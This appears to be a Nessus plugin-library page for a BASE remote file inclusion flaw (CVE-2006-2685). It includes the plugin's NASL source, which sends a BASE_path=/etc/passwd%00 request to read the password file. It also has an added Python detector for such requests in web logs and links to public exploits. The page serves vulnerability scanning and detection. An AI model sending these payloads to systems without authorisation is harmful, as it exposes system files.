BASE Multiple Script BASE_path Parameter Remote File Inclusion - Nessus

Medium   Plugin ID: 21611

This page contains detailed information about the BASE Multiple Script BASE_path Parameter Remote File Inclusion Nessus plugin, including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying this vulnerability.

Plugin Overview


ID: 21611
Name: BASE Multiple Script BASE_path Parameter Remote File Inclusion
Filename: base_BASE_path_file_include.nasl
Vulnerability Published: 2006-05-25
This Plugin Published: 2006-05-27
Last Modification Time: 2022-04-11
Plugin Version: 1.22
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: http_version.nasl
Required KB Items: www/PHP
Excluded KB Items: Settings/disable_cgi_scanning

Vulnerability Information


Severity: Medium
Vulnerability Published: 2006-05-25
Patch Published: N/A
CVE: CVE-2006-2685
CPE: cpe:/a:secureideas:basic_analysis_and_security_engine

Synopsis

The remote web server contains a PHP application that is prone to remote file inclusion attacks.

Description

The remote host is running BASE, a web-based tool for analyzing alerts from one or more SNORT sensors.

The version of BASE installed on the remote host fails to sanitize input to the 'BASE_path' parameter before using it in a PHP include_once() call in several scripts. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit this flaw to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.
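To check web server logs for requests that target this flaw, the following added example (not part of the plugin or of BASE) scans access-log lines for PHP requests that set BASE_path in the query string and labels the supplied value. The log lines are constructed samples, and the rule assumes that legitimate clients never send BASE_path because the application sets it itself.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a common/combined access-log line: "METHOD target HTTP/x.y"
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (addresses are documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/May/2006:10:00:01 +0000] "GET /base/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/May/2006:10:00:07 +0000] '
    '"GET /base/base_qry_common.php?BASE_path=/etc/passwd%00 HTTP/1.1" 200 1893',
    '192.0.2.44 - - [27/May/2006:10:00:09 +0000] '
    '"GET /base/base_qry_common.php?BASE_path=http://host.example.invalid/x HTTP/1.1" 200 412',
    '192.0.2.10 - - [27/May/2006:10:00:15 +0000] "GET /base/index.php?page=2 HTTP/1.1" 200 4870',
]

def classify(value):
    """Label why a client-supplied (already URL-decoded) BASE_path value stands out."""
    reasons = []
    if "\x00" in value:                                  # %00 truncation of the appended suffix
        reasons.append("null-byte")
    if re.match(r"(?i)^[a-z][a-z0-9+.-]*://", value):    # include target on another host
        reasons.append("remote-url")
    if value.startswith("/") or ".." in value:           # absolute path or traversal
        reasons.append("local-path")
    return reasons or ["client-supplied"]

def scan(lines):
    """Return (line_no, script_path, reasons) for every PHP request that sets BASE_path."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQ.search(line)
        if not m:
            continue                                     # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(".php"):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == "BASE_path":                       # PHP variable names are case-sensitive
                hits.append((no, url.path, classify(value)))
    return hits

if __name__ == "__main__":
    for no, path, reasons in scan(SAMPLE_LOG):
        print(f"line {no}: {path} BASE_path flagged: {', '.join(reasons)}")
```

With register_globals enabled, PHP also accepts the variable from POST bodies and cookies, which a standard access log does not record, so a clean result here does not rule out an attempt.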

Solution

Upgrade to BASE 1.2.5 or later.

Public Exploits


Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the BASE Multiple Script BASE_path Parameter Remote File Inclusion vulnerability:

  1. Metasploit: exploit/unix/webapp/base_qry_common
    [BASE base_qry_common Remote File Include]
  2. Exploit-DB: exploits/php/webapps/1823.txt
    [EDB-1823: BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion]
  3. Exploit-DB: exploits/php/webapps/9908.rb
    [EDB-9908: BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)]
  4. Exploit-DB: exploits/php/webapps/16897.rb
    [EDB-16897: BASE - 'base_qry_common' Remote File Inclusion (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS V2 Vector: AV:N/AC:H/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C
CVSS Base Score: 4.0 (Medium)
Impact Subscore: 4.9
Exploitability Subscore: 4.9
CVSS Temporal Score: 3.3 (Low)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 3.3 (Low)

Plugin Source


This is the base_BASE_path_file_include.nasl nessus plugin source code. This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(21611);
  script_version("1.22");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-2685");
  script_bugtraq_id(18298);
  script_xref(name:"EDB-ID", value:"1823");

  script_name(english:"BASE Multiple Script BASE_path Parameter Remote File Inclusion");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to
remote file inclusion attacks.");
  script_set_attribute(attribute:"description", value:
"The remote host is running BASE, a web-based tool for analyzing alerts
from one or more SNORT sensors. 

The version of BASE installed on the remote host fails to sanitize
input to the 'BASE_path' parameter before using it in PHP
include_once() function in several scripts.  Provided PHP's
'register_globals' setting is enabled, an unauthenticated attacker may
be able to exploit this flaw to view arbitrary files on the remote
host or to execute arbitrary PHP code, possibly taken from third-party
hosts.");
  # http://sourceforge.net/project/shownotes.php?group_id=103348&release_id=422282
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dd74f480");
  script_set_attribute(attribute:"solution", value:
"Upgrade to BASE 1.2.5 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'BASE base_qry_common Remote File Include');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/27");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:secureideas:basic_analysis_and_security_engine");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Loop through various directories.
if (thorough_tests) dirs = list_uniq(make_list("/base", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the flaw to read a file.
  file = "/etc/passwd%00";
  r = http_send_recv3(method:"GET", port: port,
    item:string(
      dir, "/base_qry_common.php?",
      "BASE_path=", file ) );
  if (isnull(r)) exit(0);
  res = r[2];

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(pattern:"root:.*:0:[01]:", string:res) ||
    # we get an error saying "failed to open stream".
    egrep(pattern:"main\(/etc/passwd\\0/includes/base_signature.+ failed to open stream", string:res) ||
    # we get an error claiming the file doesn't exist or...
    egrep(pattern:"main\(/etc/passwd\).*: failed to open stream: No such file or directory", string:res) ||
    # we get an error about open_basedir restriction.
    egrep(pattern:"main.+ open_basedir restriction in effect. File\(/etc/passwd", string:res)
  )
  {
    if (egrep(string:res, pattern:"root:.*:0:[01]:"))
    {
      res = data_protection::redact_etc_passwd(output:res);
      report = string(
        "\n",
        "Here are the contents of the file '/etc/passwd' that Nessus\n",
        "was able to read from the remote host :\n",
        "\n",
        res
      );
      security_warning(port:port, extra:report);
    }
    else security_warning(port);

    exit(0);
  }
}

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/base_BASE_path_file_include.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\base_BASE_path_file_include.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/base_BASE_path_file_include.nasl

How to Run


Here is how to run the BASE Multiple Script BASE_path Parameter Remote File Inclusion as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select BASE Multiple Script BASE_path Parameter Remote File Inclusion plugin ID 21611.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl base_BASE_path_file_include.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a base_BASE_path_file_include.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - base_BASE_path_file_include.nasl -t <IP/HOST>

Run the plugin using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state base_BASE_path_file_include.nasl -t <IP/HOST>

References


BID | SecurityFocus Bugtraq ID: 18298

See also: http://www.nessus.org/u?dd74f480

Similar and related Nessus plugins:
  • 39536 - BASE < 1.2.5 readRoleCookie() Auth Bypass
  • 145266 - Oracle Database Server Multiple Vulnerabilities (Jan 2021 CPU)
  • 146016 - CentOS 8 : qt5-qtbase and qt5-qtwebsockets (CESA-2020:4690)
  • 14641 - Oracle Database Multiple Remote Vulnerabilities (Mar 2005)
  • 148894 - Oracle Database Server Multiple Vulnerabilities (Apr 2021 CPU)
  • 148977 - Oracle NoSQL Database Multiple Vulnerabilities (Apr 2021 CPU)
  • 152026 - Oracle Database Server Multiple Vulnerabilities (Jul 2021 CPU)
  • 154253 - Oracle NoSQL Database Multiple Vulnerabilities (Oct 2021 CPU)
  • 154332 - Oracle Database Server Multiple Vulnerabilities (October 2021 CPU)
  • 157637 - AlmaLinux 8 : qt5-qtbase and qt5-qtwebsockets (ALSA-2020:4690)
  • 158067 - Debian DLA-2923-1 : h2database - LTS security update
  • 158090 - Debian DSA-5076-1 : h2database - security update
  • 158252 - H2 Database JNDI Lookup RCE (CVE-2021-42392)
  • 160079 - Oracle Database Server (Apr 2022 CPU)
  • 16209 - Oracle Database Multiple Vulnerabilities (January 2005 CPU)
  • 18034 - Oracle Database 10g Multiple Remote Vulnerabilities
  • 19106 - FreeBSD : linux_base -- vulnerabilities in Red Hat 7.1 libraries (bf2e7483-d3fa-440d-8c6e-8f1f2f018818)
  • 19218 - Sybase EAServer WebConsole jaqadmin Default Password
  • 22309 - SAP DB / MaxDB WebDBM Client Database Name Remote Overflow
  • 22923 - FreeBSD : mysql -- database 'case-sensitive' privilege escalation (a0e92718-6603-11db-ab90-000e35fd8194)
  • 23641 - MODx CMS base_path Parameter Remote File Inclusion
  • 23863 - GLSA-200612-11 : AMD64 x86 emulation base libraries: OpenSSL multiple vulnerabilities
  • 29218 - Sun OpenOffice.org < 2.3.1 Database HSQLDB Database Document Handling Arbitrary Java Code Execution
  • 38664 - Intel Common Base Agent CreateProcessA() Function Remote Command Execution
  • 45073 - openSUSE Security Update : OpenOffice_org-base-drivers-postgresql (OpenOffice_org-base-drivers-postgresql-1981)
  • 45075 - openSUSE Security Update : OpenOffice_org-base-drivers-postgresql (OpenOffice_org-base-drivers-postgresql-1980)
  • 45625 - Oracle Database Multiple Vulnerabilities (January 2010 CPU)
  • 45626 - Oracle Database Multiple Vulnerabilities (April 2010 CPU)
  • 51573 - Oracle Database Multiple Vulnerabilities (January 2011 CPU)
  • 53897 - Oracle Database Multiple Vulnerabilities (April 2011 CPU)
  • 56051 - Oracle Database Multiple Vulnerabilities (January 2006 CPU)
  • 56054 - Oracle Database Multiple Vulnerabilities (October 2006 CPU)
  • 56055 - Oracle Database Multiple Vulnerabilities (January 2007 CPU)
  • 56056 - Oracle Database Multiple Vulnerabilities (April 2007 CPU)

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file base_BASE_path_file_include.nasl version 1.22. For more plugins, visit the Nessus Plugin Library.